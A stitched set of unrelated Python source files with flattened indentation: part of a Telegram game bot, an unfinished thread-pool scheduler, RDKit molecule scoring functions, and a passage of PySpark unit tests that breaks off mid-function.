update.message.reply_text("https://github.com/theFox6/HPIMysterybot")
def main():
updater = Updater(token=token)
dispatcher = updater.dispatcher
def loadData():
try:
f = open('backup/conversations', 'rb')
story.conv_handler.conversations = pickle.load(f)
f.close()
f = open('backup/userdata', 'rb')
users.users = pickle.load(f)
f.close()
f = open('backup/scores', 'rb')
users.highscores = pickle.load(f)['scores']
f.close()
except FileNotFoundError:
logging.error("Data file not found")
except:
logging.error(sys.exc_info()[0])
def saveData():
# Before pickling
resolved = dict()
for k, v in story.conv_handler.conversations.items():
if isinstance(v, tuple) and len(v) is 2 and isinstance(v[1], Promise):
try:
new_state = v[1].result() # Result of async function
except:
new_state = v[0] # In case async function raised an error, fallback to old state
resolved[k] = new_state
else:
resolved[k] = v
try:
f = open('backup/conversations', 'wb+')
pickle.dump(resolved, f)
f.close()
f = open('backup/userdata', 'wb+')
pickle.dump(users.all, f)
f.close()
f = open('backup/scores', 'wb+')
pickle.dump({'scores' : users.highscores}, f)
f.close()
except:
logging.error(sys.exc_info()[0])
loadData()
def stop_and_restart():
saveData()
"""Gracefully stop the Updater and replace the current process with a new one"""
updater.stop()
logging.debug("stopped updater")
#py_exec = '"' + sys.executable + '"'
#os.execl(py_exec, py_exec, *sys.argv)
os.system("python main.py")
def restart(bot, update):
print('Bot is restarting...')
update.message.reply_text('Bot is restarting...')
print(update.message.from_user.name + " requested a restart")
Thread(target=stop_and_restart).start()
if len(owners) == 0:
print("no owners file: disabling restart command")
else:
dispatcher.add_handler(CommandHandler('restart', restart, filters=Filters.user(username=owners)))
dispatcher.add_handler(CommandHandler('source', send_source))
dispatcher.add_handler(story.conv_handler)
dispatcher.add_handler(hints.callback_handler)
dispatcher.add_error_handler(errors.error_callback)
updater.start_polling()
print("bot ready")
updater.idle()
if __name__ == '__main__':
main()
|
scheduler.py | import threading
from PyQt5 import QtCore
class ThreadPool():
def __init__(self):
self.max_num_threads = 8
self.current_num_threads = 0
self.threads = []
for thread_index in range(self.max_num_threads):
self.threads.append(threading.Thread())
# find an available thread from the pool
def get_thread(self, str_name):
if thread_is_active(str_name):
self.wait_for_thread(str_name)
def thread_is_active(self, str_name):
found_thread = self.find_thread(str_name)
if found_thread != None:
# thread is alive if can't join so it is active if it isn't alive
# not too sure about this might just wanna subclass thread
return found_thread.is_alive()
return False
def find_thread(self, str_name):
for thread in self.threads:
if thread.name == str_name:
return thread
return None
def start_thread(self, str_thread_name):
# find the first available and start it?
for thread in self.threads:
if thread.name == str_thread_name:
if not thread.is_alive():
thread.name = str_thread_name
# idk how to handle the callback yet?
thread.start()
break
else:
thread = self.wait_for_thread(str_thread_name)
thread.start()
break
def wait_for_thread(self, str_name):
current_thread = find_thread(str_name)
busy_wait_thread = self.find_or_create_thread("Busy Wait " + str_name, self.busy_wait)
# not using the wait thread: todo
busy_wait_thread.start_thread("Busy Wait")
current_thread = self.find_thread(str_name)
return current_thread
def busy_wait(self, desired_thread):
while desired_thread.is_alive():
none = None
# todo: doesnt respect size of max_num_threads
def find_or_create_thread(self, str_name, _func, *kwargs):
for thread in self.threads:
if thread.name == str_name:
print("found thread " + str_name)
self.wait_for_thread(str_name)
return thread
else:
if self.current_num_threads < self.max_num_threads:
if len(kwargs) != 0:
print("not here")
new_thread = threading.Thread(target=_func, args=kwargs)
else:
print("here")
new_thread = threading.Thread(target=_func)
new_thread.name = str_name
self.threads.append(new_thread)
return new_thread
else:
raise Exception("too many threads, this will need revisited")
def profile(self):
str_return_msg = ""
for thread in self.threads:
if self.thread_is_active(thread):
str_return_msg += "Active Thread: " + thread.name + "\n"
else:
str_return_msg += "Dead Thread: " + thread.name + "\n"
return str_return_msg
class ProgressReporter():
def __init__(self, event_name_str):
self.name = event_name_str
progress = 0.0
def set_progress(self, percent):
self.progress = percent
# emit progress_changed
class Event():
def __init__(self, str_name, _thread, _func, *kwargs):
self.name = str_name
self.thread = _thread
self.func = _func
self.args = kwargs
self.progress = ProgressReporter(self.name)
def pre_start(self):
print("Starting event " + self.name)
if self.thread is None:
print(self.print())
raise Exception("Event has no thread")
if self.func is None:
print(self.print())
raise Exception("Event has no function attached")
def print(self):
str_return_msg = ""
str_return_msg += "Event Name " + self.name + "\n"
return str_return_msg
# The scheduler is the interface into the event system
# A scheduled event is an event that will run on its own
# thread and tell the scheduler when it finishes
# also will have support for recurring timed events
class Scheduler():
def __init__(self):
self.event_queue = [] # for now will be a history, but will eventually actually be a queue
self.thread_pool = ThreadPool()
self.scheduler_lock = threading.Lock()
self.run = True
self.scheduler_thread = self.thread_pool.find_or_create_thread("Scheduler", self._run_scheduler)
self.thread_pool.start_thread("Scheduler")
def create_event(self, str_event_name, _func, *kwargs):
print("adding event " + str_event_name)
self.scheduler_lock.acquire()
event_thread = self.thread_pool.find_or_create_thread(str_event_name, _func, kwargs)
new_event = Event(str_event_name, event_thread, _func, kwargs)
self.event_queue.append(new_event)
self.scheduler_lock.release()
def profile(self):
# no lock yolo, prob needs fixed
print(self.thread_pool.profile())
print("------- List of Events in our queue (history for now) reverse order")
for event in self.event_queue:
print("Event: " + event.print())
def _run_scheduler(self):
print("event loop outer")
while self.run:
self.scheduler_lock.acquire()
for event in self.event_queue:
print("event loop")
# run checks and stuff
event.pre_start()
# kick off the thread (also handle waiting if we have to)
self.thread_pool.start_thread(event.name)
self.event_queue.clear()
self.scheduler_lock.release()
def join(self, str_event_name):
thread = self.thread_pool.find_thread(str_event_name)
if thread is not None:
thread.join()
def kill(self):
self.run = False |
scoring_functions.py | #!/usr/bin/env python
from __future__ import print_function, division
import numpy as np
from rdkit import Chem
from rdkit import rdBase
from rdkit.Chem import AllChem
from rdkit import DataStructs
from sklearn import svm
import time
import pickle
import re
import threading
import pexpect
rdBase.DisableLog('rdApp.error')
"""Scoring function should be a class where some tasks that are shared for every call
can be reallocated to the __init__, and has a __call__ method which takes a single SMILES of
argument and returns a float. A multiprocessing class will then spawn workers and divide the
list of SMILES given between them.
Passing *args and **kwargs through a subprocess call is slightly tricky because we need to know
their types - everything will be a string once we have passed it. Therefor, we instead use class
attributes which we can modify in place before any subprocess is created. Any **kwarg left over in
the call to get_scoring_function will be checked against a list of (allowed) kwargs for the class
and if a match is found the value of the item will be the new value for the class.
If num_processes == 0, the scoring function will be run in the main process. Depending on how
demanding the scoring function is and how well the OS handles the multiprocessing, this might
be faster than multiprocessing in some cases."""
class no_sulphur():
"""Scores structures based on not containing sulphur."""
kwargs = []
def __init__(self):
pass
def __call__(self, smile):
mol = Chem.MolFromSmiles(smile)
if mol:
has_sulphur = any(atom.GetAtomicNum() == 16 for atom in mol.GetAtoms())
return float(not has_sulphur)
return 0.0
class tanimoto():
"""Scores structures based on Tanimoto similarity to a query structure.
Scores are only scaled up to k=(0,1), after which no more reward is given."""
kwargs = ["k", "query_structure"]
k = 0.7
query_structure = "Cc1ccc(cc1)c2cc(nn2c3ccc(cc3)S(=O)(=O)N)C(F)(F)F"
def __init__(self):
query_mol = Chem.MolFromSmiles(self.query_structure)
self.query_fp = AllChem.GetMorganFingerprint(query_mol, 2, useCounts=True, useFeatures=True)
def __call__(self, smile):
mol = Chem.MolFromSmiles(smile)
if mol:
fp = AllChem.GetMorganFingerprint(mol, 2, useCounts=True, useFeatures=True)
score = DataStructs.TanimotoSimilarity(self.query_fp, fp)
score = min(score, self.k) / self.k
return float(score)
return 0.0
class activity_model():
"""Scores based on an ECFP classifier for activity."""
kwargs = ["clf_path"]
clf_path = 'data/clf.pkl'
def __init__(self):
with open(self.clf_path, "rb") as f:
self.clf = pickle.load(f)
def __call__(self, smile):
mol = Chem.MolFromSmiles(smile)
if mol:
fp = activity_model.fingerprints_from_mol(mol)
score = self.clf.predict_proba(fp)[:, 1]
return float(score)
return 0.0
@classmethod
def fingerprints_from_mol(cls, mol):
fp = AllChem.GetMorganFingerprint(mol, 3, useCounts=True, useFeatures=True)
size = 2048
nfp = np.zeros((1, size), np.int32)
for idx,v in fp.GetNonzeroElements().items():
nidx = idx%size
nfp[0, nidx] += int(v)
return nfp
class Worker():
"""A worker class for the Multiprocessing functionality. Spawns a subprocess
that is listening for input SMILES and inserts the score into the given
index in the given list."""
def __init__(self, scoring_function=None):
"""The score_re is a regular expression that extracts the score from the
stdout of the subprocess. This means only scoring functions with range
0.0-1.0 will work, for other ranges this re has to be modified."""
self.proc = pexpect.spawn('./multiprocess.py ' + scoring_function,
encoding='utf-8')
print(self.is_alive())
def __call__(self, smile, index, result_list):
self.proc.sendline(smile)
output = self.proc.expect([re.escape(smile) + " 1\.0+|[0]\.[0-9]+", 'None', pexpect.TIMEOUT])
if output is 0:
score = float(self.proc.after.lstrip(smile + " "))
elif output in [1, 2]:
score = 0.0
result_list[index] = score
def is_alive(self):
return self.proc.isalive()
class Multiprocessing():
"""Class for handling multiprocessing of scoring functions. OEtoolkits cant be used with
native multiprocessing (cant be pickled), so instead we spawn threads that create
subprocesses."""
def __init__(self, num_processes=None, scoring_function=None):
self.n = num_processes
self.workers = [Worker(scoring_function=scoring_function) for _ in range(num_processes)]
def alive_workers(self):
return [i for i, worker in enumerate(self.workers) if worker.is_alive()]
def __call__(self, smiles):
scores = [0 for _ in range(len(smiles))]
smiles_copy = [smile for smile in smiles]
while smiles_copy:
alive_procs = self.alive_workers()
if not alive_procs:
raise RuntimeError("All subprocesses are dead, exiting.")
# As long as we still have SMILES to score
used_threads = []
# Threads name corresponds to the index of the worker, so here
# we are actually checking which workers are busy
for t in threading.enumerate():
# Workers have numbers as names, while the main thread cant
# be converted to an integer
try:
n = int(t.name)
used_threads.append(n)
except ValueError:
continue
free_threads = [i for i in alive_procs if i not in used_threads]
for n in free_threads:
if smiles_copy:
# Send SMILES and what index in the result list the score should be inserted at
smile = smiles_copy.pop()
idx = len(smiles_copy)
t = threading.Thread(target=self.workers[n], name=str(n), args=(smile, idx, scores))
t.start()
time.sleep(0.01)
for t in threading.enumerate():
try:
n = int(t.name)
t.join()
except ValueError:
continue
return np.array(scores, dtype=np.float32)
class Singleprocessing():
"""Adds an option to not spawn new processes for the scoring functions, but rather
run them in the main process."""
def __init__(self, scoring_function=None):
self.scoring_function = scoring_function()
def __call__(self, smiles):
scores = [self.scoring_function(smile) for smile in smiles]
return np.array(scores, dtype=np.float32)
def get_scoring_function(scoring_function, num_processes=None, **kwargs):
"""Function that initializes and returns a scoring function by name"""
scoring_function_classes = [no_sulphur, tanimoto, activity_model]
scoring_functions = [f.__name__ for f in scoring_function_classes]
scoring_function_class = [f for f in scoring_function_classes if f.__name__ == scoring_function][0]
if scoring_function not in scoring_functions:
raise ValueError("Scoring function must be one of {}".format([f for f in scoring_functions]))
for k, v in kwargs.items():
if k in scoring_function_class.kwargs:
setattr(scoring_function_class, k, v)
if num_processes == 0:
return Singleprocessing(scoring_function=scoring_function_class)
return Multiprocessing(scoring_function=scoring_function, num_processes=num_processes)
|
tests.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
